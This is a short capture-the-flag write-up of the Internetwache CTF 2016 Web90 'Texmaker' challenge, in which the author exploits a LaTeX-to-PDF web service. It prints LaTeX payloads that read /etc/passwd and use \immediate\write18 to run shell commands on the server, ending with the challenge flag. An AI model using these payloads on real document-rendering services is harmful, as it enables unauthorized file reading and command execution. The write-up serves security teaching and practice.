Internetwache CTF 2016 — Web90 — Texmaker

This problem was my favorite of those I tried. When first navigating to the challenge site you are presented with an input field which generates LaTex, which is then used to generate a PDF.

This paper discusses methods for exploiting LaTex, including some sample code which could be used for reading files from the server.

\openin5=/etc/passwd
\def\readfile{%
    \read5 to \curline
    \ifeof5 \let\next=\relax
    \else \curline~\\
        \let\next=\readfile
    \fi
    \next} %
\ifeof5 Couldn’t Read the File! %
\else \readfile \closein5
\fi

After generating and checking the PDF I got the following:

Sweet sweet local files

The next step was learning how I could execute commands to look around the file system. I came across the \immediate\write18 combo of commands in this post, which will allow you to run commands on the server. The following line outputs the ls command to a temporary file.

\immediate\write18(ls /tmp/ > /tmp/tmpfile)

Looking into the /var/www/texmaker.ctf.internetwache.org/ directory, I found what I suspected was my flag file (flag.php).

Probably just cat the file right?

After trying a number of other ways of accessing the file (cat, grep, sed, head, tail, etc) I tried to run php -s which returns the source of the input php file.

I put together the following final payload and browsed to /pdf/derp.txt (as it was publicly accessible), revealing the flag!

\immediate\write18{php -s ../flag.php > ../pdf/derp.txt}

There’s the flag!

IW{L4T3x_IS_Tur1ng_c0mpl3te}